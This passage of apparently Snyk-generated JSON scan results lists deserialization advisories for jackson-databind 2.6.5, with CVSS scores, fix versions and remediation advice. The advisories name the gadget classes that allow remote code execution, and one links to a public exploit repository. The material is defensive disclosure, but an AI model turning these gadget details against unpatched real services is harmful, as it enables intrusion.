"https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.033731Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.83638", - "probability": "0.00984", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14379" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-07-29T14:55:33.030000Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.502907Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2449", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.808389Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", - "epssDetails": { - "percentile": "0.71702", - "probability": "0.00342", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16335" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-85cw-hj65-qqv9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:06.837179Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:30:24Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:30:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.931793Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "iSafeBlue" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2410", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.892322Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", - "epssDetails": { - "percentile": "0.74104", - "probability": "0.00410", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14540" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h822-r4r5-v8jg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:10.401907Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:27:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:27:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.008832Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2420", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:32.899468Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T14:43:42.115110Z", - "functions_new": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-16T14:37:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T14:37:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:32.899468Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:50.462784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on 